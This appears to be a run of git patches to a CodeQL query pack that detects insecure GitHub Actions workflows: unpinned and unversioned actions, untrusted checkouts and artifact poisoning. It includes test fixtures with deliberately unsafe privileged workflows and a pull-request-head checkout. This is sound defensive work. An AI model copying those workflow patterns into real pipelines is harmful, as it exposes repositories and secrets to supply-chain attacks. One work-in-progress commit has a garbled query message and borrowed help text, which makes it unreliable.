.github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -472,6 +476,14 @@ nodes | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From c44c3bae9fffad54b3b72e3a2a7f0ccd4d1fcafd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 21:39:58 +0200 Subject: [PATCH 0595/1267] Update tests --- ql/test/library-tests/commands.expected | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected index 12092de34ef..35305671cf0 100644 --- a/ql/test/library-tests/commands.expected +++ b/ql/test/library-tests/commands.expected @@ -195,6 +195,8 @@ | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | echo "foo" | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | From 7cba2e07bc232808a5dbc2ec08b044ec2d3c8097 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 21:40:40 +0200 Subject: [PATCH 0596/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 12cf4c6106a..e5471e23651 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.68 +version: 0.1.69 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b10da74b711..660f3287090 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.68 +version: 0.1.69 groups: [actions, queries] suites: codeql-suites extractor: javascript From 325727ed6dc6ccc0f7bd2e8ed70084a574f3c7f9 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 17 Oct 2024 15:59:45 -0400 Subject: [PATCH 0597/1267] recommend to add octokit to trusted orgs --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 10c21bc368b..2111cc118a9 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) + exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From cf9b853a8fba8dac3be1f6d173caf4673edaed2c Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 17 Oct 2024 16:14:03 -0400 Subject: [PATCH 0598/1267] unversioned immutable actions wip --- ql/lib/codeql/actions/config/Config.qll | 11 ++++++ .../actions/config/ConfigExtensions.qll | 7 ++++ ql/lib/ext/config/immutable_actions.yml | 22 +++++++++++ .../CWE-829/UnversionedImmutableAction.md | 27 +++++++++++++ .../CWE-829/UnversionedImmutableAction.ql | 38 +++++++++++++++++++ 5 files changed, 105 insertions(+) create mode 100644 ql/lib/ext/config/immutable_actions.yml create mode 100644 ql/src/Security/CWE-829/UnversionedImmutableAction.md create mode 100644 ql/src/Security/CWE-829/UnversionedImmutableAction.ql diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 82b7a53a9d7..a439f999623 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -119,6 +119,17 @@ predicate vulnerableActionsDataModel( Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version) } +/** + * MaD models for vulnerable actions + * Fields: + * - action: action name + */ +predicate immutableActionsDataModel( + string action +) { + Extensions::immutableActionsDataModel(action) +} + /** * MaD models for untrusted git commands * Fields: diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index a32e9c445f2..c36ad046a3c 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -58,6 +58,13 @@ extensible predicate vulnerableActionsDataModel( string action, string vulnerable_version, string vulnerable_sha, string fixed_version ); +/** + * Holds for actions that are known to be immutable. + */ +extensible predicate immutableActionsDataModel( + string action +); + /** * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. */ diff --git a/ql/lib/ext/config/immutable_actions.yml b/ql/lib/ext/config/immutable_actions.yml new file mode 100644 index 00000000000..072e8ed0b09 --- /dev/null +++ b/ql/lib/ext/config/immutable_actions.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: immutableActionsDataModel + data: + - ["actions/checkout"] + - ["actions/cache"] + - ["actions/setup-node"] + - ["actions/upload-artifact"] + - ["actions/setup-python"] + - ["actions/download-artifact"] + - ["actions/github-script"] + - ["actions/setup-java"] + - ["actions/setup-go"] + - ["actions/upload-pages-artifact"] + - ["actions/deploy-pages"] + - ["actions/setup-dotnet"] + - ["actions/stale"] + - ["actions/labeler"] + - ["actions/create-github-app-token"] + - ["actions/configure-pages"] + - ["octokit/request-action"] diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md new file mode 100644 index 00000000000..eab708f8602 --- /dev/null +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md @@ -0,0 +1,27 @@ +# Unpinned tag for 3rd party Action in workflow + +## Description + +Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack. + +## Recommendations + +Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork. + +## Examples + +### Incorrect Usage + +```yaml +- uses: tj-actions/changed-files@v44 +``` + +### Correct Usage + +```yaml +- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44 +``` + +## References + +- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql new file mode 100644 index 00000000000..d9a1394641f --- /dev/null +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -0,0 +1,38 @@ +/** + * @name Unversioned Immutable Action + * @description Using an Immutable Action without a semantic version tag opts out of the protections of Immutable Action + * @kind problem + * @security-severity 5.0 + * @problem.severity recommendation + * @precision high + * @id actions/unversioned-immutable-action + * @tags security + * actions + * external/cwe/cwe-829 + */ + +import actions + +bindingset[version] +private predicate isSemanticVersioned(string version) { version.regexpMatch("^v[0-9]+(\\.[0-9]+)*(\\.[xX])?$") } + +bindingset[repo] +private predicate isTrustedOrg(string repo) { + exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) +} + +from UsesStep uses, string repo, string version, Workflow workflow, string name +where + uses.getCallee() = repo and + uses.getEnclosingWorkflow() = workflow and + ( + workflow.getName() = name + or + not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name + ) and + uses.getVersion() = version and + not isTrustedOrg(repo) and + not isPinnedCommit(version) +select uses.getCalleeNode(), + "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + + "', not a pinned commit hash", uses, uses.toString() From e5508343b197f0bca8dff57e5fe97f41d0bf31f9 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Fri, 18 Oct 2024 15:21:33 -0400 Subject: [PATCH 0599/1267] update unpinned actions tag test --- .../query-tests/Security/CWE-829/UnpinnedActionsTag.expected | 3 --- 1 file changed, 3 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index d05c7bebc07..a9e5134b28e 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -10,9 +10,6 @@ | .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | From 2d5cd1a61a978417e8c20cf13febd4680823be97 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Fri, 18 Oct 2024 16:51:31 -0400 Subject: [PATCH 0600/1267] WIP. todo: modify help text in query to be helpful, write qlhelp file, find out how to not release to customers --- ql/lib/codeql/actions/config/Config.qll | 2 +- .../UseOfUnversionedImmutableAction.qll | 11 +++++++ .../CWE-829/UnversionedImmutableAction.ql | 29 ++++--------------- .../actions/dangerous-git-checkout/action.yml | 2 +- .../UnversionedImmutableAction.expected | 19 ++++++++++++ .../CWE-829/UnversionedImmutableAction.qlref | 1 + 6 files changed, 38 insertions(+), 26 deletions(-) create mode 100644 ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll create mode 100644 ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected create mode 100644 ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index a439f999623..a21f3e358d1 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -120,7 +120,7 @@ predicate vulnerableActionsDataModel( } /** - * MaD models for vulnerable actions + * MaD models for immutable actions * Fields: * - action: action name */ diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll new file mode 100644 index 00000000000..2be71612f26 --- /dev/null +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -0,0 +1,11 @@ +import actions + +class UnversionedImmutableAction extends UsesStep { + string immutable_action; + + UnversionedImmutableAction() { + immutableActionsDataModel(immutable_action) and + this.getCallee() = immutable_action and + not this.getVersion().regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") + } +} diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql index d9a1394641f..0c6443bc3e6 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -2,7 +2,6 @@ * @name Unversioned Immutable Action * @description Using an Immutable Action without a semantic version tag opts out of the protections of Immutable Action * @kind problem - * @security-severity 5.0 * @problem.severity recommendation * @precision high * @id actions/unversioned-immutable-action @@ -12,27 +11,9 @@ */ import actions +import codeql.actions.security.UseOfUnversionedImmutableAction -bindingset[version] -private predicate isSemanticVersioned(string version) { version.regexpMatch("^v[0-9]+(\\.[0-9]+)*(\\.[xX])?$") } - -bindingset[repo] -private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) -} - -from UsesStep uses, string repo, string version, Workflow workflow, string name -where - uses.getCallee() = repo and - uses.getEnclosingWorkflow() = workflow and - ( - workflow.getName() = name - or - not exists(workflow.getName()) and workflow.getLocation().getFile().getBaseName() = name - ) and - uses.getVersion() = version and - not isTrustedOrg(repo) and - not isPinnedCommit(version) -select uses.getCalleeNode(), - "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + - "', not a pinned commit hash", uses, uses.toString() +from UnversionedImmutableAction step +select step, + "The workflow is using an immutable action ($@) without versinoning so it doesn't work", step, + step.getCallee() \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml index 57058e7a076..cd4f0fe660a 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -4,7 +4,7 @@ runs: using: "composite" steps: - name: Checkout repo - uses: actions/checkout@v4 + uses: actions/checkout@4 with: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 2 diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected new file mode 100644 index 00000000000..5ae46862fb4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected @@ -0,0 +1,19 @@ +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | +| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | +| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref new file mode 100644 index 00000000000..6ce4123fa5e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref @@ -0,0 +1 @@ +Security/CWE-829/UnversionedImmutableAction.ql \ No newline at end of file From e03ba558129fbf8de923df7b3d17b54a6fcc639d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 19 Oct 2024 17:01:29 +0200 Subject: [PATCH 0601/1267] Account for checkout path on Untrusted Checkout Critical --- .../security/ArtifactPoisoningQuery.qll | 7 +- .../actions/security/PoisonableSteps.qll | 2 + .../CWE-829/UntrustedCheckoutCritical.ql | 33 +- .../CWE-829/.github/workflows/test16.yml | 294 ++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 18 ++ 5 files changed, 347 insertions(+), 7 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 9355462962d..48bca0e46f9 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -276,7 +276,12 @@ class ArtifactPoisoningSink extends DataFlow::Node { ) or poisonable.(UsesStep) = this.asExpr() and - download.getPath() = "GITHUB_WORKSPACE/" + ( + not poisonable instanceof LocalActionUsesStep and + download.getPath() = "GITHUB_WORKSPACE/" + or + isSubpath(poisonable.(LocalActionUsesStep).getPath(), download.getPath()) + ) ) } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 5e62aa675ee..99d844bae79 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -49,4 +49,6 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { class LocalActionUsesStep extends PoisonableStep, UsesStep { LocalActionUsesStep() { this.getCallee().matches("./%") } + + string getPath() { result = normalizePath(this.getCallee()) } } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 37628a29489..4b87ad00c0f 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -20,12 +20,33 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from PRHeadCheckoutStep checkout, PoisonableStep step, Event event +from PRHeadCheckoutStep checkout, PoisonableStep poisonable, Event event where // the checkout is followed by a known poisonable step - checkout.getAFollowingStep() = step and + checkout.getAFollowingStep() = poisonable and + ( + poisonable instanceof Run and + ( + // Check if the poisonable step is a local script execution step + // and the path of the command or script matches the path of the downloaded artifact + isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), checkout.getPath()) + or + // Checking the path for non local script execution steps is very difficult + not poisonable instanceof LocalScriptExecutionRunStep + // Its not easy to extract the path from a non-local script execution step so skipping this check for now + // and isSubpath(poisonable.(Run).getWorkingDirectory(), checkout.getPath()) + ) + or + poisonable instanceof UsesStep and + ( + not poisonable instanceof LocalActionUsesStep and + checkout.getPath() = "GITHUB_WORKSPACE/" + or + isSubpath(poisonable.(LocalActionUsesStep).getPath(), checkout.getPath()) + ) + ) and // the checkout occurs in a privileged context - inPrivilegedContext(step, event) and - not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) -select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event, - event.getLocation().getFile().toString() + inPrivilegedContext(poisonable, event) and + not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) +select poisonable, checkout, poisonable, "Execution of untrusted code on a privileged workflow. $@", + event, event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml new file mode 100644 index 00000000000..4ceb9a4c72f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test16.yml @@ -0,0 +1,294 @@ +name: Post-Build +run-name: Post-Build on ${{ github.event.workflow_run.head_branch }} +on: + workflow_run: + types: [ 'completed' ] + workflows: + - Build +concurrency: + # Cancel concurrent jobs on pull_request but not push, by including the run_id in the concurrency group for the latter. + group: post-build-${{ github.event.workflow_run.event == 'push' && github.run_id || 'pr' }}-${{ github.event.workflow_run.head_branch }} + cancel-in-progress: true + +env: + COMPOSER_ROOT_VERSION: "dev-trunk" + SUMMARY: Post-Build run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for Build run [#${{ github.event.workflow_run.id }}](${{ github.event.workflow_run.html_url }}) + +permissions: + actions: read + contents: read + pull-requests: read + +# Note the job logic here is a bit unusual. That's because this workflow is triggered by `workflow_run`, and so is not shown on the PR by default. +# Instead we have to manually report back, including where we could normally just skip or let a failure be handled. +# - If the "Build" job failed, we need to set our status as failed too (build_failed). +# - If the find_artifact job fails for some reason, we need a step to explicitly report that back. +# - If no plugins are found, we need to explicitly report back a "skipped" status. +# - And the upgrade_test job both explicitly sets "in progress" at its start and updates at its end. +# +# If you're wanting to add a new check, you'd want to do the following: +# - Add a step in the `setup` workflow to create your check, and a corresponding output for later steps to have the ID. +# - Add a step in the `build_failed` workflow to set your run to cancelled. +# - Add a job to run whatever tests you need to run, with steps similar to the `upgrade_test` workflow's "Get token", "Notify check in progress", and "Notify final status". +# - Add a step in the `no_plugins` workflow to set your run to skipped if your job only runs when there are plugins built. + +jobs: + setup: + name: Setup + runs-on: ubuntu-latest + timeout-minutes: 2 # 2022-12-20: Seems like it should be fast. + outputs: + upgrade_check: ${{ steps.upgrade_check.outputs.id }} + steps: + - name: Log info + run: | + echo "$SUMMARY" >> $GITHUB_STEP_SUMMARY + + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Create "Test plugin upgrades" check' + id: upgrade_check + uses: ./.github/actions/check-run + with: + name: Test plugin upgrades + sha: ${{ github.event.workflow_run.head_sha }} + status: queued + title: Test queued... + summary: | + ${{ env.SUMMARY }} + token: ${{ steps.get_token.outputs.token }} + + build_failed: + name: Handle build failure + runs-on: ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion != 'success' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. + steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" cancelled' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: cancelled + title: Build failed + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the build did not succeed. + token: ${{ steps.get_token.outputs.token }} + + find_artifact: + name: Find artifact + runs-on: ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion == 'success' + 